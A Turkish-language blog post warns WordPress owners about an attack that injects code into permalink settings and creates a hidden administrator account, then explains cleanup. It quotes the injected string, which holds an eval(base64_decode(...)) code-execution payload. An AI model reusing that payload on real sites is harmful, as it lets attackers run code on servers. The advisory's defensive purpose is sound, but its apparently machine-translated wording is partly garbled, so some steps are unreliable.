WordPress SQL Enjeksiyonu – Son Saldırı

Yakın tarihli bir SQL saldırısı, kodun sitenize eklendiği birçok siteyi vurdu. Bu MySQL enjeksiyonu, kalıcı bağlantılarınızı etkisiz hale getirerek etkiler. Sonuç olarak, blog gönderilerinizin URL’leri çalışmaz. Bu saldırıda birçok WordPress blogu vuruldu, dikkatimizi çektiği için Andy Soward’a teşekkürler.

Bu saldırı sonucunda aşağıdaki kodlardan biri kalıcı bağlantı yapınıza eklendi:

%&({${eval(base64_decode($_SERVER(HTTP_REFERER))))}} |. +) & %

“/% & (%7B$

Bu alıntılar, sitenizdeki tüm kalıcı bağlantıları içerir ve yalnızca manuel olarak kaldırılırsa değiştirilebilir.

Bunu düzeltmek için şu adrese gidin:

Ayarlar > Kalıcı Bağlantılar ve yukarıdaki kodu kaldırın ve varsayılan kodunuzu değiştirin.

Bir sonraki yapılacak şey, Kullanıcılar’a gitmek. Birden fazla yönetici olduğunu göreceksiniz. Listede adınızı görmeyeceksiniz ama sayının arttığını göreceksiniz. Yani yapmanız gereken, tüm kullanıcılara bakmak ve kaydolan son kişiyi bulmak. Bu kullanıcının üzerine gelin ve bağlantıyı alın. Bu sayıya 1 ekleyerek userid=code’u değiştirin Yani görebildiğiniz son kullanıcı kullanıcı #2 ise 1 ekleyin ve bunu 3 yapın. İlk önce gizli yöneticinin ad olarak garip bir kodu olduğunu görmelisiniz. Kodu kaldırın ve abone olun. Sonra geri dönün ve silin.

Bu sorunu çözecektir. PHPMyAdmin’inize giderek de silebilirsiniz. Çünkü orada kullanıcıları göreceksiniz.

Kullanıcılarımızın güncel kalabilmesi için bu haberi mümkün olan en kısa sürede yayınlamak istiyoruz. Blogunuza virüs bulaşmadığından emin olun. WordPress’in yakında çıkacağını umuyoruz.

Ayrıca, WordPress yönetici alanınızı korumak için bu önlemlerden bazılarını henüz almadıysanız.